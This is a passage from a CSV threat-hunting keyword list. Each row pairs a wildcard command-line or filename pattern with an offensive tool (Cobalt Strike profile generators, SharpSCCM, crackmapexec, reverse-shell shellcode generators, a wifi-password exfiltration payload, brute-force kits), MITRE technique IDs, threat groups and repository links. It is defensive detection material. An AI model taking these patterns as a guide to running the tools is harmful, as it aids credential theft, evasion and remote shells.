T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* inceptor.*dotnet*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"* inceptor.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"* inceptor.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"* inceptor.spec*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"* --includeModules amass*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"* -InFile Wi-Fi-PASS*","offensive_tool_keyword","wifigrabber","grab wifi password and exfiltrate to a given site","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/wifigrabber","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"* informix-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* informix-query.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* informix-tables.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* -Injector NtMapViewOfSection*","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","0","N/A","10","10","792","122","2022-11-17T01:04:04Z","2021-08-06T20:55:26Z" +"* -Injector VirtualAllocEx*","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","0","N/A","10","10","792","122","2022-11-17T01:04:04Z","2021-08-06T20:55:26Z" +"* --input 10m_usernames.txt*","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","7","697","61","2023-03-31T16:18:14Z","2022-09-18T10:35:09Z" +"* -InputPath .\TrustedForests.txt*","offensive_tool_keyword","Locksmith","A tiny tool to identify and remediate common misconfigurations in Active Directory Certificate Services","T1552.006 - T1222 - T1046","TA0007 - TA0040 - TA0043","N/A","N/A","Discovery","https://github.com/TrimarcJake/Locksmith","1","0","N/A","8","5","473","38","2023-10-02T02:29:08Z","2022-04-28T01:37:32Z" +"* instabf.py*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/insta-bf","1","0","N/A","7","1","39","6","2021-12-23T17:41:12Z","2020-11-20T22:22:48Z" +"* instainsane.sh*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/umeshshinde19/instainsane","1","0","N/A","7","5","473","329","2023-08-22T21:49:22Z","2018-12-02T22:48:11Z" +"* install *masscan*","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","10","21688","2980","2023-08-09T13:28:54Z","2013-07-28T05:35:33Z" +"* install armitage*","offensive_tool_keyword","armitage","Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets. recommends exploits and exposes the advanced capabilities of the framework ","T1210 - T1059.003 - T1547.001 - T1057 - T1046 - T1562.001 - T1071.001 - T1060 - T1573.002","TA0002 - TA0008 - TA0005 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t0v3rr1d3/armitage","1","0","N/A","N/A","1","81","15","2022-12-06T00:17:23Z","2022-01-23T17:32:01Z" +"* install autobloody*","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","0","N/A","10","4","330","38","2023-10-04T14:40:59Z","2022-09-07T13:34:30Z" +"* install backdoor-factory*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"* install chisel*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"* install evil-winrm*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* install github *merlin*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","0","N/A","10","10","58","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" +"* install hekatomb*","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1087.002 - T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","AD Enumeration","https://github.com/Processus-Thief/HEKATOMB","1","0","N/A","N/A","4","372","40","2023-02-08T16:00:47Z","2022-09-09T15:07:15Z" +"* install holehe*","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","0","N/A","6","10","5662","655","2023-09-15T21:14:10Z","2020-06-25T23:03:02Z" +"* install krbjack*","offensive_tool_keyword","krbjack","A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.","T1558.002 - T1552.004 - T1048.005","TA0006 - TA0007 ","N/A","N/A","Sniffing & Spoofing","https://github.com/almandin/krbjack","1","0","N/A","10","1","73","13","2023-05-21T15:00:07Z","2023-04-16T10:44:55Z" +"* install nikto*","offensive_tool_keyword","nikto","Nikto web server scanner","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/sullo/nikto","1","1","N/A","N/A","10","7136","1096","2023-09-18T14:44:28Z","2012-11-24T04:24:29Z" +"* install wapiti3*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"* install wfuzz*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* install wordlists*","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* install-sb.sh*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","0","N/A","7","10","2419","268","2023-07-14T10:59:10Z","2019-03-28T18:07:05Z" +"* insTof.py*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/insta-bf","1","0","N/A","7","1","39","6","2021-12-23T17:41:12Z","2020-11-20T22:22:48Z" +"* intel -d * -whois*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"* interact -u http*://*/*.aspx -p *","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1100 - T1059 - T1505","TA0002 - TA0003 - TA0004","N/A","N/A","Web Attacks","https://github.com/antonioCoco/SharPyShell","1","0","N/A","N/A","9","809","144","2023-09-27T08:48:31Z","2019-03-10T22:09:40Z" +"* --interface * --analyze --disable-ess*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* --interface * --analyze --lm --disable-ess*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* -Internalmonologue -Command *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"* Inveigh-*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-InveighRelay.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* invoke admin-service -q *","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","412","53","2023-09-16T17:33:11Z","2021-08-19T05:09:19Z" +"* invoke admin-service -q *","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","412","53","2023-09-16T17:33:11Z","2021-08-19T05:09:19Z" +"* invoke query *FROM SMS_Admin*","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","412","53","2023-09-16T17:33:11Z","2021-08-19T05:09:19Z" +"* invoke_sessiongopher*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* invoke_vnc*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* --ip * --port * --type cmd --language *","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/senzee1984/micr0_shell","1","0","N/A","9","1","91","12","2023-09-16T02:35:28Z","2023-08-13T02:46:51Z" +"* -ip * -smb2support *lwpshare* ","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -IP * -SpooferIP * -HTTP N*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" +"* --ip * --variable shellcode *","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/senzee1984/micr0_shell","1","0","N/A","9","1","91","12","2023-09-16T02:35:28Z","2023-08-13T02:46:51Z" +"* ip-forwarding.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ip-geolocation-geoplugin.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ip-geolocation-ipinfodb.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ip-geolocation-map-bing.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ip-geolocation-map-google.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ip-geolocation-map-kml.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ip-geolocation-maxmind.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ip-https-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ipidseq.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ipmi-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ipmi-cipher-zero.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ipmi-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ipv6-multicast-mld-list.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ipv6-node-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ipv6-ra-flood.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* irc-botnet-channels.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* irc-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* irc-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - 